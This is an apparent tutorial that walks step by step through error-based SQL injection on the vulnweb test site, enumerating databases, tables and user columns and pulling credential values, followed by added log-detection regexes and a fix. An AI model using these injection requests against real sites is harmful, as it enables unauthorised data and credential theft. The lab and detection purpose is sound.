  • SQL Server manual injection

    Test site: testasp.vulnweb.com

    1.

    http://testasp.vulnweb.com/showforum.asp?id=0

    http://testasp.vulnweb.com/showforum.asp?id=0'

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2

    2. Database version

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)

    3. Database name

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())

    4. First database

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)

    Returns: Conversion failed when converting the nvarchar value 'acublog' to data type int

    5.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')

    Returns: Conversion failed when converting the nvarchar value 'acuforum' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')

    Returns: Conversion failed when converting the nvarchar value 'acuservice' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')

    Returns: Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    So these are all the databases.

    6. Get table names

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')

    Returns: Conversion failed when converting the nvarchar value 'threads' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')

    Returns: Conversion failed when converting the nvarchar value 'users' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')

    Returns: Conversion failed when converting the nvarchar value 'forums' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')

    Returns: Conversion failed when converting the nvarchar value 'posts' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')

    Returns: Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    7. Column names of users

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))

    Returns: Conversion failed when converting the nvarchar value 'uname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')

    Returns: Conversion failed when converting the nvarchar value 'upass' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')

    Returns: Conversion failed when converting the nvarchar value 'email' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')

    Returns: Conversion failed when converting the nvarchar value 'realname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')

    Returns: Conversion failed when converting the nvarchar value 'avatar' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')

    Returns: Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    Column names of forums

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))

    8.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)

    Returns: Conversion failed when converting the nvarchar value '--' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)

    Returns: Conversion failed when converting the nvarchar value 'none' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname  from users where id =2)

    Returns:
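
A detection-side view of the requests in steps 2 through 8, as an added example that is not part of the original post: it scans web-server log lines for the `and 1=(select ...)` conversion probe and the system-catalog names used above, and flags a client whose `name<>` exclusion list grows by one per request. The log lines, field layout, rule names and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines: date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /showforum.asp id=0 200
2024-01-01 10:00:02 203.0.113.5 GET /showforum.asp id=0+and+1=(select+@@version) 500
2024-01-01 10:00:03 203.0.113.5 GET /showforum.asp id=0+and+1=(select+top+1+name+from+sysobjects+where+xtype='u') 500
2024-01-01 10:00:04 203.0.113.5 GET /showforum.asp id=0+and+1=(select+top+1+name+from+sysobjects+where+xtype='u'+and+name%3C%3E+'threads') 500
2024-01-01 10:00:05 203.0.113.5 GET /showforum.asp id=0+and+1=(select+top+1+name+from+sysobjects+where+xtype='u'+and+name%3C%3E+'threads'+and+name%3C%3E+'users') 500
2024-01-01 10:00:06 198.51.100.9 GET /showforum.asp id=2 200
"""

RULES = {
    # integer compared with a subquery: the forced nvarchar-to-int conversion
    "cast_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\(\s*select\b", re.I),
    # version/database functions and system catalogs queried in steps 2 to 7
    "catalog": re.compile(r"@@version|db_name\s*\(|sysdatabases|sysobjects|syscolumns", re.I),
}
EXCLUSION = re.compile(r"name\s*<>\s*'[^']*'", re.I)

def scan(log_text):
    """Return {client_ip: {"hits", "rules", "chain"}} for requests matching RULES."""
    report = defaultdict(lambda: {"hits": 0, "rules": set(), "chain": []})
    for line in log_text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue
        ip, query = parts[2], unquote_plus(parts[5])
        matched = {name for name, rx in RULES.items() if rx.search(query)}
        if matched:
            entry = report[ip]
            entry["hits"] += 1
            entry["rules"] |= matched
            # number of name<>'...' exclusions carried by this request
            entry["chain"].append(len(EXCLUSION.findall(query)))
    return dict(report)

def is_enumerating(entry, min_steps=3):
    """True when exclusion counts climb by one per request (0, 1, 2, ...)."""
    run = best = 1
    for prev, cur in zip(entry["chain"], entry["chain"][1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best >= min_steps

if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, entry["hits"], sorted(entry["rules"]), is_enumerating(entry))
```

Detection complements the fix rather than replacing it: binding `id` as an integer parameter and returning a generic error page removes the conversion message these requests depend on.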

  • Original article: https://www.cnblogs.com/nightnine/p/5479900.html